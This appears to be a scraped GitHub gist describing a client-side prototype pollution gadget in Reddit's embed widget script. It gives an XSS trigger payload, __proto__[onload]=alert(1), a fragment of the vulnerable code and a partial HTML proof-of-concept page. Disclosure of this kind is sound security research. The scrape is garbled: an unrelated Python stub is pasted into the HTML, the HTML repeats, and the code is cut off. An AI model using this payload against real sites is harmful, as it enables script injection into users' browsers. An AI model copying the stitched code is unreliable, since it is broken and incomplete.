Guilherme Keerok keerok

## dependents.py
import requests
from time import sleep
import sys

names = []
stars = []
final = dict()
account_name = sys.argv[1]
project_name = sys.argv[2]
uri = "https://github.com/"+account_name+"/"+project_name+"/network/dependents?dependent_type=PACKAGE"

## README.md

      
              2 files
            
          
              1 fork
            
          
              0 comments
            
          
              7 stars
            
          
                keerok
                / README.md
            
            
              Last active
              October 17, 2021 14:51
            
              
                client-side prototype pollution gadget using cross-origin embedded reddit posts
              
          
the payload to trigger the XSS is __proto__[onload]=alert(1)

vulnerable code(file: http://embed.redditmedia.com/widgets/platform.js):
n.prototype.init = function(a, b, c, d) {
                if (this.elem = b,
                this.options = c,
                !c.url)


## css.html
<!DOCTYPE html>
<html lang="en" dir="ltr">
	<head>
		<meta charset="utf-8">
		<title></title>
				<h1>working on chrome linux & mac</h1>
    <a href="" target=_blank>click me before</a>
	</head>
	<body>
		<button type="button" id=clickme name="button">click me</button>
	import requests
	from time import sleep
	import sys

	names = []
	stars = []
	final = dict()
	account_name = sys.argv[1]
	project_name = sys.argv[2]
	uri = "https://github.com/"+account_name+"/"+project_name+"/network/dependents?dependent_type=PACKAGE"
	<!DOCTYPE html>
	<html lang="en" dir="ltr">
	<head>
	<meta charset="utf-8">
	<title></title>
	<h1>working on chrome linux & mac</h1>
	<a href="" target=_blank>click me before</a>
	</head>
	<body>
	<button type="button" id=clickme name="button">click me</button>